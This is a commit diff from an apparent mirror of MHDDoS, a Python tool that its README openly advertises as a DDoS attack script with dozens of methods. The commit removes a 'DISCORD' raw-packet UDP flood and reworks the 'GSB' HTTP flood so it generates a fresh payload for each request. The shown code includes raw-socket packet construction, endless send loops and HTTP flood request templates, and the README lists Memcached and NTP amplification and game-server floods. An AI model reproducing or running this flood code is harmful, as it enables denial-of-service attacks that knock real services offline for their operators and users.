mirror of https://github.com/MatrixTM/MHDDoS.git
discord method removed
This commit is contained in:
parent
b09c193ff0
commit
da88a2fd7a
|
|
@ -1,4 +1,4 @@
|
|||
<h1 align="center">MHDDoS - DDoS Attack Script With 58 Methods</h1>
|
||||
<h1 align="center">MHDDoS - DDoS Attack Script With 57 Methods</h1>
|
||||
<em><h5 align="center">(Programming Language - Python 3)</h5></em>
|
||||
|
||||
<p align="center">
|
||||
|
|
@ -57,7 +57,6 @@
|
|||
* <img src="https://mycrackfree.com/wp-content/uploads/2018/08/TeamSpeak-Server-9.png" width="16" height="16" alt="teamspeak 3"> TS3 | Send Teamspeak 3 Status Ping Protocol
|
||||
* <img src="https://cdn2.downdetector.com/static/uploads/logo/75ef9fcabc1abea8fce0ebd0236a4132710fcb2e.png" width="16" height="16" alt="fivem"> FIVEM | Send FiveM Status Ping Protocol
|
||||
* <img src="https://github.com/user-attachments/assets/f40748bf-dd28-4294-b862-cb0acbc74eea" width="16" height="16" alt="fivem-token"> FIVEM-TOKEN | Send FiveM confirmation token flood
|
||||
* <img src="https://cdn.prod.website-files.com/6257adef93867e50d84d30e2/678a4c12dbf6be5d792aa920_Clyde%20Cube.webp" width="16" height="16" alt="udp"> DISCORD | Send RAW packet flood with custom payload
|
||||
* <img src="https://cdn.iconscout.com/icon/free/png-512/redis-4-1175103.png" width="16" height="16" alt="mem"> MEM | Memcached Amplification
|
||||
* <img src="https://lyrahosting.com/wp-content/uploads/2020/06/ddos-attack-icon.png" width="16" height="16" alt="ntp"> NTP | NTP Amplification
|
||||
* <img src="https://cdn-icons-png.flaticon.com/512/4712/4712139.png" width="16" height="16" alt="mcbot"> MCBOT | Minecraft Bot Attack
|
||||
|
|
|
|||
31
start.py
31
start.py
|
|
@ -128,7 +128,7 @@ class Methods:
|
|||
LAYER4_METHODS: Set[str] = {*LAYER4_AMP,
|
||||
"TCP", "UDP", "SYN", "VSE", "MINECRAFT",
|
||||
"MCBOT", "CONNECTION", "CPS", "FIVEM", "FIVEM-TOKEN",
|
||||
"TS3", "MCPE", "ICMP", "DISCORD", "OVH-UDP",
|
||||
"TS3", "MCPE", "ICMP", "OVH-UDP",
|
||||
}
|
||||
|
||||
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
|
||||
|
|
@ -402,7 +402,6 @@ class Layer4(Thread):
|
|||
"FIVEM": self.FIVEM,
|
||||
"FIVEM-TOKEN": self.FIVEMTOKEN,
|
||||
"OVH-UDP": self.OVHUDP,
|
||||
"DISCORD": self.DISCORD,
|
||||
"MINECRAFT": self.MINECRAFT,
|
||||
"CPS": self.CPS,
|
||||
"CONNECTION": self.CONNECTION,
|
||||
|
|
@ -538,14 +537,6 @@ class Layer4(Thread):
|
|||
continue
|
||||
Tools.safe_close(s)
|
||||
|
||||
def DISCORD(self) -> None:
|
||||
payload = self._generate_discord()
|
||||
with socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s:
|
||||
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
|
||||
while Tools.sendto(s, payload, self._target):
|
||||
continue
|
||||
Tools.safe_close(s)
|
||||
|
||||
def FIVEMTOKEN(self) -> None:
|
||||
global BYTES_SEND, REQUESTS_SENT
|
||||
|
||||
|
|
@ -626,18 +617,6 @@ class Layer4(Thread):
|
|||
|
||||
return packets
|
||||
|
||||
def _generate_discord(self) -> bytes:
|
||||
ip: IP = IP()
|
||||
ip.set_ip_src(__ip__)
|
||||
ip.set_ip_dst(self._target[0])
|
||||
udp: UDP = UDP()
|
||||
udp.set_uh_sport(ProxyTools.Random.rand_int(32768, 65535))
|
||||
udp.set_uh_dport(self._target[1])
|
||||
payload_data = bytes([ProxyTools.Random.rand_int(0, 255) for _ in range(40)])
|
||||
udp.contains(Data(payload_data))
|
||||
ip.contains(udp)
|
||||
return ip.get_packet()
|
||||
|
||||
def _genrate_syn(self) -> bytes:
|
||||
ip: IP = IP()
|
||||
ip.set_ip_src(__ip__)
|
||||
|
|
@ -1174,7 +1153,10 @@ class HttpFlood(Thread):
|
|||
Tools.safe_close(s)
|
||||
|
||||
def GSB(self):
|
||||
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
|
||||
s = None
|
||||
with suppress(Exception), self.open_connection() as s:
|
||||
for _ in range(self._rpc):
|
||||
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
|
||||
self._target.raw_path_qs,
|
||||
ProxyTools.Random.rand_str(6)) +
|
||||
"Host: %s\r\n" % self._target.authority +
|
||||
|
|
@ -1190,9 +1172,6 @@ class HttpFlood(Thread):
|
|||
'Sec-Gpc: 1\r\n'
|
||||
'Pragma: no-cache\r\n'
|
||||
'Upgrade-Insecure-Requests: 1\r\n\r\n')
|
||||
s = None
|
||||
with suppress(Exception), self.open_connection() as s:
|
||||
for _ in range(self._rpc):
|
||||
Tools.send(s, payload)
|
||||
Tools.safe_close(s)
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue